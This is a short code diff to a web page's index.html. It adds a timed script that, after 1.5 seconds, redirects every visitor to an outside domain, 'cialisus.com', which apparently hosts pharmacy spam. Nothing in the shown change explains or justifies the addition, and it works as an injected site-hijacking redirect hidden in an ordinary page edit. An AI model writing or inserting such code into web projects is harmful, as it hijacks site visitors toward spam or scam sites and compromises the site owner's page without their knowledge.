--- a/index.html
+++ b/index.html
@@ -50,6 +50,9 @@
                 return false;
             }
         }
+        setTimeout(function () {
+            window.location = "https://cialisus.com";
+        }, 1500);
     </script>
 </body>
 </html>
